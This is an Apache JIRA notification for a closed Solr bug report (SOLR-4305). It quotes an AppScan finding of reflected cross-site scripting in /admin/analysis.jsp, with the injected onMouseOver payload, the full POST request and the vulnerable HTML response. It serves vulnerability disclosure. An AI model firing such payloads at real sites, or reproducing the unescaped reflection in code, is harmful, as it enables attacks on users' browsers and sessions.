[ https://issues.apache.org/jira/browse/SOLR-4305?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]
Jan Høydahl closed SOLR-4305. ----------------------------- Resolution: Won't Fix Closing as won't fix as we do not have JSPs anymore :) > XSS vulnerability in Solr /admin/analysis.jsp > --------------------------------------------- > > Key: SOLR-4305 > URL: https://issues.apache.org/jira/browse/SOLR-4305 > Project: Solr > Issue Type: Bug > Components: multicore > Affects Versions: 3.6 > Environment: Solaris > Reporter: Rob Brooks > Labels: security > > This issue was found when running solr 3.6 in solaris, in a multicore setup. > Each core had a cross site scripting vulnerability found at > /admin/analysis.jsp while testing using IBM Rational AppScan 8.5.0.1. > Here are the details of the scan result as given by IBM Rational AppScan: > [1 of 1] Cross-Site Scripting > Severity: High > Test Type: Application > Vulnerable URL: https://<server>/solr/<core>/admin/analysis.jsp (Parameter: > name) > CVE ID(s): N/A > CWE ID(s): 79 (parent of 83) > Remediation Tasks: Review possible solutions for hazardous character injection > Variant 1 of 6 [ID=19389] > The following changes were applied to the original request: > • Set parameter 'name's value to '" onMouseOver=alert(39846)//' > Request/Response: > 12/10/2012 3:33:04 PM 16/187 > POST /solr/<core>/admin/analysis.jsp HTTP/1.1 > Cookie: JSESSIONID=0D77846A894B8BB086394C396F19D0E9 > Content-Length: 96 > Accept: */* > Accept-Language: en-us > User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; > Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR > 3.0.30729; > Media Center PC 6.0; Tablet PC 2.0) > Host: <server>:8443 > Content-Type: application/x-www-form-urlencoded > Referer: https://<server>/solr/<core>/admin/analysis.jsp?highlight=on > nt=type&name=" onMouseOver=alert > (39846)//&verbose=on&highlight=on&val=1234&qverbose=on&qval=1234 > HTTP/1.1 200 OK > Content-Length: 1852 > Server: Apache-Coyote/1.1 > Content-Type: text/html;charset=utf-8 > Date: Mon, 10 Dec 2012 15:54:38 GMT > <html> > <head> > <script> > var host_name="<server>" > </script> > <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> > <link rel="stylesheet" type="text/css" href="solr-admin.css"> > <link rel="icon" href="favicon.ico" type="image/ico"></link> > <link rel="shortcut icon" href="favicon.ico" type="image/ico"></link> > <title>Solr admin page</title> > </head> > <body> > <a href="."><img border="0" align="right" height="78" width="142" > src="solr_small.png" alt="Solr"></a> > <h1>Solr Admin (Cares) > </h1> > <server><br/> > cwd=/export/home/kh SolrHome=/solr/<core>/ > <br/> > 12/10/2012 3:33:04 PM 17/187 > HTTP caching is ON > <br clear="all"> > <h2>Field Analysis</h2> > <form method="POST" action="analysis.jsp" accept-charset="UTF-8"> > <table> > <tr> > <td> > <strong>Field > <select name="nt"> > <option >name</option> > <option selected="selected">type</option> > </select></strong> > </td> > <td> > <input class="std" name="name" type="text" value="" > onMouseOver=alert(39846)//"> > </td> > </tr> > <tr> > <td> > <strong>Field value (Index)</strong> > <br/> > verbose output > <input name="verbose" type="checkbox" > checked="true" > > <br/> > highlight matches > <input name="highlight" type="checkbox" > checked="true" > > </td> > <td> > <textarea class="std" rows="8" cols="70" name="val">1234</textarea> > </td> > </tr> > <tr> > <td> > <strong>Field value (Query)</strong> > <br/> > verbose output > <input name="qverbose" type="checkbox" > checked="true" > > </td> > <td> > <textarea class="std" rows="1" cols="70" name="qval">1234</textarea> > </td> > </tr> > <tr> > <td> > </td> > <td> > <input class="stdbutton" type="submit" value="analyze"> > </td> > </tr> > </table> > </form> > <strong>Unknown Field Type: " onMouseOver=alert(39846)//</strong> > </body> > </html> > 12/10/2012 3:33:04 PM 18/187 > Validation In Response: > • option> > <option selected="selected">type</option> > </select></strong> > </td> > <td> > <input class="std" name="name" type="text" value="" onMouseOver=alert > (39846)//"> > </td> > </tr> > <tr> > <td> > <strong>Field value (Index)</strong> > <br/> > verbose output > <inp > Reasoning: > The test successfully embedded a script in the response, which will be > executed once the user > activates the OnMouseOver function (i.e., hovers with the mouse cursor over > the vulnerable > control). This means that the application is vulnerable to Cross-Site > Scripting attacks. > CWE ID: > 83 (child of 79) > Vulnerable URL: https://<server>/solr/<core>/admin/threaddump.jsp > Total of 1 security issues in this URL -- This message was sent by Atlassian JIRA (v6.3.4#6332) --------------------------------------------------------------------- To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org For additional commands, e-mail: dev-h...@lucene.apache.org